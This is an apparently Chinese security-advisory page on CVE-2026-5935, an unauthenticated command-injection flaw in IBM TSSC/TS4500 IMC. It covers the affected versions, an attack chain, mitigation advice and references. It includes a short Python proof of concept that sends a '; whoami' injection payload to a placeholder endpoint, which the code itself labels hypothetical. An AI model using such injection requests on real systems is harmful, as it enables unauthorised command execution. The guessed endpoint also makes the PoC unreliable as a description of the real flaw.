CVE-2026-5935 CVSS 7.3 高危

CVE-2026-5935 IBM TSSC/TS4500 远程代码执行漏洞

披露日期: 2026-04-23

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5935

漏洞类型

远程代码执行 (RCE)

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

IBM Total Storage Service Console (TSSC) / TS4500 IMC

漏洞概述

IBM Total Storage Service Console (TSSC) 及 TS4500 IMC 的多个版本存在严重安全漏洞。由于系统未正确验证用户提供的输入，未经身份验证的远程攻击者可利用此漏洞，在目标系统上以普通用户权限执行任意命令，从而威胁系统的机密性、完整性和可用性。

技术细节

该漏洞源于应用程序在处理用户输入时缺乏严格的验证机制，导致命令注入攻击。攻击者无需任何认证即可通过网络访问受影响接口。通过构造特制的恶意数据包并发送给目标系统，攻击者能够欺骗后端将输入数据作为操作系统命令执行。尽管执行权限被限制在普通用户级别，但这仍允许攻击者窃取敏感信息、篡改配置或中断服务，对存储管理环境构成实质性威胁。

攻击链分析

STEP 1

侦察

攻击者扫描网络以发现暴露的 IBM TSSC 或 TS4500 IMC 管理接口。

STEP 2

漏洞利用

攻击者向存在漏洞的接口发送特制的 HTTP 请求，其中包含恶意注入的命令载荷。

STEP 3

命令执行

由于系统未对输入进行有效过滤，后端将恶意数据作为系统命令执行。

STEP 4

建立控制

攻击者获取命令执行结果，以普通用户权限对系统进行进一步控制或数据窃取。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (Hypothetical endpoint based on vulnerability description)
target_url = "http://target-tssc-ip:port/vulnerable_api_endpoint"

# Malicious payload to execute arbitrary command (e.g., 'whoami')
# The payload exploits improper input validation to inject commands.
payload = "; whoami"

# Headers often required for console APIs
headers = {
    "User-Agent": "Mozilla/5.0",
    "Content-Type": "application/x-www-form-urlencoded"
}

try:
    # Send the malicious request without authentication
    # The vulnerability specifically requires no authentication (PR:N)
    response = requests.post(target_url, data={"user_input": payload}, headers=headers, timeout=10)
    
    if response.status_code == 200:
        print("[+] Exploit successful! Command output:")
        print(response.text)
    else:
        print(f"[-] Request failed with status code: {response.status_code}")

except Exception as e:
    print(f"[!] An error occurred: {e}")

影响范围

IBM TSSC/TS4500 IMC 9.2

IBM TSSC/TS4500 IMC 9.3

IBM TSSC/TS4500 IMC 9.4

IBM TSSC/TS4500 IMC 9.5

IBM TSSC/TS4500 IMC 9.6

防御指南

临时缓解措施

如果无法立即安装补丁，建议将受影响设备的管理接口隔离在内部网络中，并禁用不必要的服务。同时，应实施严格的网络访问控制列表（ACL），阻止外部对管理端口的访问，直到完成修复。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5935
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5935
3 Details https://www.cvedetails.com/cve/CVE-2026-5935/
4 VulDB https://vuldb.com/cve/CVE-2026-5935
5 Link https://www.ibm.com/support/pages/node/7270127

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表